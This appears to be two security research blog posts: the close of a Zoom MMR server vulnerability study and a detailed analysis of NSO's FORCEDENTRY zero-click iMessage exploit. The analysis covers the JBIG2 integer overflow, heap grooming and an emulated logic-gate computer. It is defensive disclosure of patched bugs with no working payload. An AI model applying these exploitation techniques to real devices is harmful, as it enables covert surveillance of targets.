One last idea I had was to use another type confusion bug to leak a pointer to a controllable buffer. There is one such bug in the processing of deserialized ssb::kv_update_req objects. This object’s ssb::dyna_para_table_t table contains a variant named nodeid which represents the specific Zoom client that the message refers to. If an attacker changes this variant to be of type array instead of a 32-bit integer, the address of the pointer to this array will be logged as a string. I tried to combine CVE-2021-34424 with this bug, hoping that it might be possible for the leaked data to be this log string that contains pointer information. Unfortunately, I wasn’t able to get this to work because of timing: the log entry needs to be logged at almost exactly the same time as the bug is triggered so that the log data is still in memory, and I wasn't able to send packets fast enough. I suspect it might be possible for this to work with improved automation, as I was relying on clients hooked with Frida and browsers to interact with the Zoom server, but I decided not to pursue this as it would require tooling that would take substantial effort to develop.

Conclusion

I performed a security analysis of Zoom and reported two vulnerabilities. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

The vulnerabilities in Zoom’s MMR server are especially concerning, as this server processes meeting audio and video content, so a compromise could allow an attacker to monitor any Zoom meetings that do not have end-to-end encryption enabled. While I was not successful in exploiting these vulnerabilities, I was able to use them to perform many elements of exploitation, and I believe that an attacker would be able to exploit them with sufficient investment. The lack of ASLR in the Zoom MMR process greatly increased the risk that an attacker could compromise it, and it is positive that Zoom has recently enabled it. That said, if vulnerabilities similar to the ones that I reported still exist in the MMR server, it is likely that an attacker could bypass it, so it is also important that Zoom continue to improve the robustness of the MMR code.

It is also important to note that this research was possible because Zoom allows customers to set up their own servers, meanwhile no other video conferencing solution with proprietary servers that I have investigated allows this, so it is unclear how these results compare to other video conferencing platforms.

Overall, while the client bugs that were discovered during this research were comparable to what Project Zero has found in other videoconferencing platforms, the server bugs were surprising, especially when the server lacked ASLR and supports modes of operation that are not end-to-end encrypted.

There are a few factors that commonly lead to security problems in videoconferencing applications that contributed to these bugs in Zoom. One is the huge amount of code included in Zoom. There were large portions of code that I couldn’t determine the functionality of, and many of the classes that could be deserialized didn’t appear to be commonly used. This both increases the difficulty of security research and increases the attack surface by making more code that could potentially contain vulnerabilities available to attackers. In addition, Zoom uses many proprietary formats and protocols which meant that understanding the attack surface of the platform and creating the tooling to manipulate specific interfaces was very time consuming. Using the features we tested also required paying roughly $1500 USD in licensing fees. These barriers to security research likely mean that Zoom is not investigated as often as it could be, potentially leading to simple bugs going undiscovered.  

Still, my largest concern in this assessment was the lack of ASLR in the Zoom MMR server. ASLR is arguably the most important mitigation in preventing exploitation of memory corruption, and most other mitigations rely on it on some level to be effective. There is no good reason for it to be disabled in the vast majority of software. There has recently been a push to reduce the susceptibility of software to memory corruption vulnerabilities by moving to memory-safe languages and implementing enhanced memory mitigations, but this relies on vendors using the security measures provided by the platforms they write software for. All software written for platforms that support ASLR should have it (and other basic memory mitigations) enabled.

The closed nature of Zoom also impacted this analysis greatly. Most video conferencing systems use open-source software, either WebRTC or PJSIP. While these platforms are not free of problems, it’s easier for researchers, customers and vendors alike to verify their security properties and understand the risk they present because they are open. Closed-source software presents unique security challenges, and Zoom could do more to make their platform accessible to security researchers and others who wish to evaluate it. While the Zoom Security Team helped me access and configure server software, it is not clear that support is available to other researchers, and licensing the software was still expensive. Zoom, and other companies that produce closed-source security-sensitive software should consider how to make their software accessible to security researchers.

A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution

By: Ryan
15 December 2021 at 17:00

Posted by Ian Beer & Samuel Groß of Google Project Zero

We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. The editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works.

Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we've ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.

The vulnerability discussed in this blog post was fixed on September 13, 2021 in iOS 14.8 as CVE-2021-30860.

NSO

NSO Group is one of the highest-profile providers of "access-as-a-service", selling packaged hacking solutions which enable nation state actors without a home-grown offensive cyber capability to "pay-to-play", vastly expanding the number of nations with such cyber capabilities.

For years, groups like Citizen Lab and Amnesty International have been tracking the use of NSO's mobile spyware package "Pegasus". Despite NSO's claims that they "[evaluate] the potential for adverse human rights impacts arising from the misuse of NSO products" Pegasus has been linked to the hacking of the New York Times journalist Ben Hubbard by the Saudi regime, hacking of human rights defenders in Morocco and Bahrain, the targeting of Amnesty International staff and dozens of other cases.

Last month the United States added NSO to the "Entity List", severely restricting the ability of US companies to do business with NSO and stating in a press release that "[NSO's tools] enabled foreign governments to conduct transnational repression, which is the practice of authoritarian governments targeting dissidents, journalists and activists outside of their sovereign borders to silence dissent."

Citizen Lab was able to recover these Pegasus exploits from an iPhone and therefore this analysis covers NSO's capabilities against iPhone. We are aware that NSO sells similar zero-click capabilities which target Android devices; Project Zero does not have samples of these exploits but if you do, please reach out.

From One to Zero

In previous cases such as the Million Dollar Dissident from 2016, targets were sent links in SMS messages:

Screenshots of Phishing SMSs reported to Citizen Lab in 2016

source: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

The target was only hacked when they clicked the link, a technique known as a one-click exploit. Recently, however, it has been documented that NSO is offering their clients zero-click exploitation technology, where even very technically savvy targets who might not click a phishing link are completely unaware they are being targeted. In the zero-click scenario no user interaction is required. Meaning, the attacker doesn't need to send phishing messages; the exploit just works silently in the background. Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.

One weird trick

The initial entry point for Pegasus on iPhone is iMessage. This means that a victim can be targeted just using their phone number or AppleID username.

iMessage has native support for GIF images, the typically small and low quality animated images popular in meme culture. You can send and receive GIFs in iMessage chats and they show up in the chat window. Apple wanted to make those GIFs loop endlessly rather than only play once, so very early on in the iMessage parsing and processing pipeline (after a message has been received but well before the message is shown), iMessage calls the following method in the IMTranscoderAgent process (outside the "BlastDoor" sandbox), passing any image file received with the extension .gif:

  [IMGIFUtils copyGifFromPath:toDestinationPath:error]

Looking at the selector name, the intention here was probably to just copy the GIF file before editing the loop count field, but the semantics of this method are different. Under the hood it uses the CoreGraphics APIs to render the source image to a new GIF file at the destination path. And just because the source filename has to end in .gif, that doesn't mean it's really a GIF file.

The ImageIO library, as detailed in a previous Project Zero blogpost, is used to guess the correct format of the source file and parse it, completely ignoring the file extension. Using this "fake gif" trick, over 20 image codecs are suddenly part of the iMessage zero-click attack surface, including some very obscure and complex formats, remotely exposing probably hundreds of thousands of lines of code.

Note: Apple inform us that they have restricted the available ImageIO formats reachable from IMTranscoderAgent starting in iOS 14.8.1 (26 October 2021), and completely removed the GIF code path from IMTranscoderAgent starting in iOS 15.0 (20 September 2021), with GIF decoding taking place entirely within BlastDoor.

A PDF in your GIF

NSO uses the "fake gif" trick to target a vulnerability in the CoreGraphics PDF parser.

PDF was a popular target for exploitation around a decade ago, due to its ubiquity and complexity. Plus, the availability of javascript inside PDFs made development of reliable exploits far easier. The CoreGraphics PDF parser doesn't seem to interpret javascript, but NSO managed to find something equally powerful inside the CoreGraphics PDF parser...

Extreme compression

In the late 1990s, bandwidth and storage were much more scarce than they are now. It was in that environment that the JBIG2 standard emerged. JBIG2 is a domain-specific image codec designed to compress images where pixels can only be black or white.

It was developed to achieve extremely high compression ratios for scans of text documents and was implemented and used in high-end office scanner/printer devices like the Xerox WorkCentre device shown below. If you used the scan-to-pdf functionality of a device like this a decade ago, your PDF likely had a JBIG2 stream in it.

A Xerox WorkCentre 7500 series multifunction printer, which used JBIG2 for its scan-to-pdf functionality

source: https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7545-7556/specifications

The PDF files produced by those scanners were exceptionally small, perhaps only a few kilobytes. There are two novel techniques which JBIG2 uses to achieve these extreme compression ratios which are relevant to this exploit:

Technique 1: Segmentation and substitution

Effectively every text document, especially those written in languages with small alphabets like English or German, consists of many repeated letters (also known as glyphs) on each page. JBIG2 tries to segment each page into glyphs then uses simple pattern matching to match up glyphs which look the same:

Simple pattern matching can find all the shapes which look similar on a page, in this case all the 'e's

JBIG2 doesn't actually know anything about glyphs, and it isn't doing OCR (optical character recognition). A JBIG2 encoder is just looking for connected regions of pixels and grouping similar-looking regions together. The compression algorithm simply substitutes all sufficiently similar-looking regions with a copy of just one of them:

Replacing all occurrences of similar glyphs with a copy of just one often yields a document which is still quite legible and enables very high compression ratios

In this case the output is perfectly readable but the amount of information to be stored is significantly reduced. Rather than needing to store all the original pixel information for the whole page you only need a compressed version of the "reference glyph" for each character and the relative coordinates of all the places where copies should be made. The decompression algorithm then treats the output page like a canvas and "draws" the exact same glyph at all the stored locations.
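A minimal sketch of that decompression step (illustrative types and names, not the real implementation): each stored reference glyph is stamped onto the 1-bit-per-pixel page canvas at every recorded position.

  #include <cstddef>

  struct Glyph     { int w, h; const unsigned char* bits; }; // 1 bit per pixel
  struct Placement { int glyph, x, y; };                     // where to stamp it

  // 'stride' is the number of bytes stored per row of the page canvas.
  void draw_glyphs(unsigned char* page, int stride, const Glyph* glyphs,
                   const Placement* places, int nPlaces) {
    for (int i = 0; i < nPlaces; ++i) {
      const Glyph& g = glyphs[places[i].glyph];
      int gStride = (g.w + 7) / 8;            // bytes per glyph row
      for (int y = 0; y < g.h; ++y)
        for (int x = 0; x < g.w; ++x)
          if (g.bits[y * gStride + (x >> 3)] & (0x80 >> (x & 7))) {
            int px = places[i].x + x, py = places[i].y + y;
            page[(size_t)py * stride + (px >> 3)] |= 0x80 >> (px & 7);
          }
    }
  }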

There's a significant issue with such a scheme: it's far too easy for a poor encoder to accidentally swap similar looking characters, and this can happen with interesting consequences. D. Kriesel's blog has some motivating examples where PDFs of scanned invoices have different figures or PDFs of scanned construction drawings end up with incorrect measurements. These aren't the issues we're looking at, but they are one significant reason why JBIG2 is not a common compression format anymore.

Technique 2: Refinement coding

As mentioned above, the substitution-based compression output is lossy. After a round of compression and decompression the rendered output doesn't look exactly like the input. But JBIG2 also supports lossless compression and an intermediate "less lossy" compression mode.

It does this by also storing (and compressing) the difference between the substituted glyph and each original glyph. Here's an example showing a difference mask between a substituted character on the left and the original lossless character in the middle:

Using the XOR operator on bitmaps to compute a difference image

In this simple example the encoder can store the difference mask shown on the right, then during decompression the difference mask can be XORed with the substituted character to recover the exact pixels making up the original character. There are some more tricks outside of the scope of this blog post to further compress that difference mask using the intermediate forms of the substituted character as a "context" for the compression.
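The XOR round trip is easy to sketch (illustrative code, not Xpdf's): since (a ^ b) ^ b == a, applying the stored mask to the substituted glyph reproduces the original pixels exactly.

  #include <cstddef>

  // Encoder: the refinement mask is the bitwise difference of the bitmaps.
  void make_mask(const unsigned char* original, const unsigned char* substituted,
                 unsigned char* mask, size_t n) {
    for (size_t i = 0; i < n; ++i) mask[i] = original[i] ^ substituted[i];
  }

  // Decoder: XORing the mask into the substituted glyph recovers the original.
  void apply_mask(unsigned char* substituted, const unsigned char* mask, size_t n) {
    for (size_t i = 0; i < n; ++i) substituted[i] ^= mask[i];
  }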

Rather than completely encoding the entire difference in one go, it can be done in steps, with each iteration using a logical operator (one of AND, OR, XOR or XNOR) to set, clear or flip bits. Each successive refinement step brings the rendered output closer to the original and this allows a level of control over the "lossiness" of the compression. The implementation of these refinement coding steps is very flexible and they are also able to "read" values already present on the output canvas.

A JBIG2 stream

Most of the CoreGraphics PDF decoder appears to be Apple proprietary code, but the JBIG2 implementation is from Xpdf, the source code for which is freely available.

The JBIG2 format is a series of segments, which can be thought of as drawing commands executed sequentially in a single pass. The CoreGraphics JBIG2 parser supports 19 different segment types which include operations like defining a new page, decoding a Huffman table or rendering a bitmap to given coordinates on the page.

Segments are represented by the class JBIG2Segment and its subclasses JBIG2Bitmap and JBIG2SymbolDict.

A JBIG2Bitmap represents a rectangular array of pixels. Its data field points to a backing buffer containing the rendering canvas.

A JBIG2SymbolDict groups JBIG2Bitmaps together. The destination page is represented as a JBIG2Bitmap, as are individual glyphs.

JBIG2Segments can be referred to by a segment number and the GList vector type stores pointers to all the JBIG2Segments. To look up a segment by segment number the GList is scanned sequentially.
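In simplified form (fields trimmed to those relevant here; see the Xpdf source for the real definitions) the pieces fit together like this:

  // Simplified sketch of the Xpdf types discussed in this post.
  class JBIG2Segment {
  public:
    JBIG2Segment(unsigned int segNumA) : segNum(segNumA) {}
    virtual ~JBIG2Segment() {}
    virtual int getType() = 0;        // e.g. jbig2SegBitmap, jbig2SegSymbolDict
    unsigned int getSegNum() { return segNum; }
  private:
    unsigned int segNum;              // the number used to reference this segment
  };

  class JBIG2Bitmap : public JBIG2Segment {
    // ...
    int w, h;                         // canvas dimensions in pixels
    int line;                         // bytes stored per row
    unsigned char* data;              // backing buffer: the rendering canvas
  };

  // Lookup by segment number is a linear scan:
  //   for each JBIG2Segment* s in segments: if (s->getSegNum() == n) return s;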

The vulnerability

The vulnerability is a classic integer overflow when collating referenced segments:

  Guint numSyms; // (1)
  numSyms = 0;
  for (i = 0; i < nRefSegs; ++i) {
    if ((seg = findSegment(refSegs[i]))) {
      if (seg->getType() == jbig2SegSymbolDict) {
        numSyms += ((JBIG2SymbolDict *)seg)->getSize();  // (2)
      } else if (seg->getType() == jbig2SegCodeTable) {
        codeTables->append(seg);
      }
    } else {
      error(errSyntaxError, getPos(),
            "Invalid segment reference in JBIG2 text region");
      delete codeTables;
      return;
    }
  }

...

  // get the symbol bitmaps
  syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *)); // (3)
  kk = 0;
  for (i = 0; i < nRefSegs; ++i) {
    if ((seg = findSegment(refSegs[i]))) {
      if (seg->getType() == jbig2SegSymbolDict) {
        symbolDict = (JBIG2SymbolDict *)seg;
        for (k = 0; k < symbolDict->getSize(); ++k) {
          syms[kk++] = symbolDict->getBitmap(k); // (4)
        }
      }
    }
  }

numSyms is a 32-bit integer declared at (1). By supplying carefully crafted reference segments it's possible for the repeated addition at (2) to cause numSyms to overflow to a controlled, small value.

That smaller value is used for the heap allocation size at (3) meaning syms points to an undersized buffer.

Inside the innermost loop at (4) JBIG2Bitmap pointer values are written into the undersized syms buffer.
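A worked example with purely illustrative sizes shows how the wrap plays out (Guint is a 32-bit unsigned type):

  #include <cstdint>

  void overflow_example() {
    uint32_t numSyms = 0;     // Guint: 32-bit unsigned
    numSyms += 0xfffe0000u;   // sizes reported by crafted symbol dictionaries...
    numSyms += 0x00020000u;   // ...the running total wraps past 2^32 to 0
    numSyms += 0x40;          // numSyms == 0x40
    // (3) now allocates just 0x40 pointers (0x200 bytes), but the copy
    // loop at (4) still visits every symbol in every referenced dictionary.
  }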

Without another trick this loop would write over 32GB of data into the undersized syms buffer, certainly causing a crash. To avoid that crash the heap is groomed such that the first few writes off of the end of the syms buffer corrupt the GList backing buffer. This GList stores all known segments and is used by the findSegment routine to map from the segment numbers passed in refSegs to JBIG2Segment pointers. The overflow causes the JBIG2Segment pointers in the GList to be overwritten with JBIG2Bitmap pointers at (4).

Conveniently, since JBIG2Bitmap inherits from JBIG2Segment, the seg->getType() virtual call succeeds even on devices where Pointer Authentication is enabled (which is used to perform a weak type check on virtual calls). But the returned type will no longer be equal to jbig2SegSymbolDict, causing the further writes at (4) not to be reached and bounding the extent of the memory corruption.

A simplified view of the memory layout when the heap overflow occurs, showing the undersized buffer below the GList backing buffer and the JBIG2Bitmap

Boundless unbounding

Directly after the corrupted segments GList, the attacker grooms the JBIG2Bitmap object which represents the current page (the place where current drawing commands render).

JBIG2Bitmaps are simple wrappers around a backing buffer, storing the buffer’s width and height (in bits) as well as a line value which defines how many bytes are stored for each line.

The memory layout of the JBIG2Bitmap object showing the segNum, w, h and line fields which are corrupted during the overflow

By carefully structuring refSegs they can stop the overflow after writing exactly three more JBIG2Bitmap pointers past the end of the segments GList buffer. This overwrites the vtable pointer and the first four fields of the JBIG2Bitmap representing the current page. Due to the nature of the iOS address space layout these pointers are very likely to be in the second 4GB of virtual memory, with addresses between 0x100000000 and 0x1ffffffff. All iOS hardware is little-endian, which means that the w and line fields are likely to be overwritten with 0x1 (the most significant half of a JBIG2Bitmap pointer), while the segNum and h fields are likely to be overwritten with the least significant half of such a pointer: a fairly random value, depending on heap layout and ASLR, somewhere between 0x100000 and 0xffffffff.
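A little-endian sketch makes the field splitting concrete (the object layout is assumed here, matching the figure above):

  #include <cstdint>
  #include <cstring>

  // Two adjacent 4-byte fields, as in the JBIG2Bitmap object header.
  struct TwoFields { uint32_t h; uint32_t line; };

  void split_example() {
    TwoFields f;
    uint64_t ptr = 0x00000001234a5000ull;  // a pointer in the second 4GB
    memcpy(&f, &ptr, sizeof(ptr));         // one 8-byte out-of-bounds write
    // f.h    == 0x234a5000  (low half: large, heap/ASLR dependent)
    // f.line == 0x00000001  (high half: always 0x1 for such pointers)
  }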

This gives the current destination page JBIG2Bitmap an unknown, but very large, value for h. Since that h value is used for bounds checking and is supposed to reflect the allocated size of the page backing buffer, this has the effect of "unbounding" the drawing canvas. This means that subsequent JBIG2 segment commands can read and write memory outside of the original bounds of the page backing buffer.

The heap groom also places the current page's backing buffer just below the undersized syms buffer, such that when the page JBIG2Bitmap is unbounded, it's able to read and write its own fields:


The memory layout showing how the unbounded bitmap backing buffer is able to reference the JBIG2Bitmap object and modify fields in it as it is located after the backing buffer in memory

By rendering 4-byte bitmaps at the correct canvas coordinates they can write to all the fields of the page JBIG2Bitmap and by carefully choosing new values for w, h and line, they can write to arbitrary offsets from the page backing buffer.
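Under the Xpdf-style 1-bit-per-pixel layout, the pixel at canvas coordinates (x, y) lives at byte offset y*line + x/8 from the start of the backing buffer, so once h is effectively unlimited and line is attacker-chosen, coordinates can be picked to land on any desired offset. A sketch of the mapping:

  #include <cstddef>

  // Byte offset of pixel (x, y) on a canvas with 'line' bytes per row.
  size_t byte_offset(int x, int y, int line) {
    return (size_t)y * line + (x >> 3);
  }
  // With h unbounded, large y values reach far outside the page buffer.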

At this point it would also be possible to write to arbitrary absolute memory addresses if you knew their offsets from the page backing buffer. But how to compute those offsets? Thus far, this exploit has proceeded in a manner very similar to a "canonical" scripting language exploit which in Javascript might end up with an unbounded ArrayBuffer object with access to memory. But in those cases the attacker has the ability to run arbitrary Javascript which can obviously be used to compute offsets and perform arbitrary computations. How do you do that in a single-pass image parser?

My other compression format is Turing-complete!

As mentioned earlier, the sequence of steps which implement JBIG2 refinement are very flexible. Refinement steps can reference both the output bitmap and any previously created segments, as well as render output to either the current page or a segment. By carefully crafting the context-dependent part of the refinement decompression, it's possible to craft sequences of segments where only the refinement combination operators have any effect.

In practice this means it is possible to apply the AND, OR, XOR and XNOR logical operators between memory regions at arbitrary offsets from the current page's JBIG2Bitmap backing buffer. And since that has been unbounded… it's possible to perform those logical operations on memory at arbitrary out-of-bounds offsets:

The memory layout showing how logical operators can be applied out-of-bounds
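A byte-aligned sketch of such a combine primitive (shape and names are assumed here; the real decoder also handles sub-byte alignment):

  #include <cstddef>

  enum CombOp { opAnd, opOr, opXor, opXNor };

  // Apply one logical operator between a source bitmap and a destination
  // region addressed relative to the (now unbounded) page canvas.
  void combine_region(unsigned char* pageData, int pageLine,
                      const unsigned char* src, int srcLine,
                      int x, int y, int wBytes, int hRows, CombOp op) {
    for (int row = 0; row < hRows; ++row) {
      unsigned char* dst = pageData + (size_t)(y + row) * pageLine + (x >> 3);
      const unsigned char* s = src + (size_t)row * srcLine;
      for (int col = 0; col < wBytes; ++col) {
        switch (op) {
          case opAnd:  dst[col] = dst[col] & s[col];    break;
          case opOr:   dst[col] = dst[col] | s[col];    break;
          case opXor:  dst[col] = dst[col] ^ s[col];    break;
          case opXNor: dst[col] = ~(dst[col] ^ s[col]); break;
        }
      }
    }
  }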

It's when you take this to its most extreme form that things start to get really interesting. What if rather than operating on glyph-sized sub-rectangles you instead operated on single bits?

You can now provide as input a sequence of JBIG2 segment commands which implement a sequence of logical bit operations to apply to the page. And since the page buffer has been unbounded those bit operations can operate on arbitrary memory.

With a bit of back-of-the-envelope scribbling you can convince yourself that with just the available AND, OR, XOR and XNOR logical operators you can in fact compute any computable function - the simplest proof being that you can create a logical NOT operator by XORing with 1 and then putting an AND gate in front of that to form a NAND gate:

An AND gate connected to one input of an XOR gate. The other XOR gate input is connected to the constant value 1, creating a NAND.

A NAND gate is an example of a universal logic gate; one from which all other gates can be built and from which a circuit can be built to compute any computable function.
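In code the construction is tiny (bits represented as 0/1 ints for illustration):

  // NAND from the operators the refinement steps provide, then every
  // other gate from NAND alone.
  int NAND(int a, int b) { return (a & b) ^ 1; } // AND, then XOR with constant 1
  int NOT (int a)        { return NAND(a, a); }
  int AND (int a, int b) { return NOT(NAND(a, b)); }
  int OR  (int a, int b) { return NAND(NOT(a), NOT(b)); }
  int XOR (int a, int b) { return AND(OR(a, b), NAND(a, b)); }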

Practical circuits

JBIG2 doesn't have scripting capabilities, but when combined with a vulnerability, it does have the ability to emulate circuits of arbitrary logic gates operating on arbitrary memory. So why not just use that to build your own computer architecture and script that!? That's exactly what this exploit does. Using over 70,000 segment commands defining logical bit operations, they build a small computer architecture with features such as registers and a full 64-bit adder and comparator, which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.
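As a rough sketch of what such an emulated adder boils down to (illustrative only; the exploit's actual circuit is encoded as tens of thousands of JBIG2 segments, not C++), here is a 64-bit ripple-carry adder expressed purely in per-bit AND/OR/XOR operations:

  #include <cstdint>

  uint64_t add64(uint64_t a, uint64_t b) {
    uint64_t sum = 0, carry = 0;
    for (int i = 0; i < 64; ++i) {
      uint64_t ai = (a >> i) & 1, bi = (b >> i) & 1;
      uint64_t s  = ai ^ bi ^ carry;                 // full-adder sum bit
      carry       = (ai & bi) | (carry & (ai ^ bi)); // full-adder carry-out
      sum |= s << i;
    }
    return sum;
  }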

The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.

In a future post (currently being finished), we'll take a look at exactly how they escape the IMTranscoderAgent sandbox.
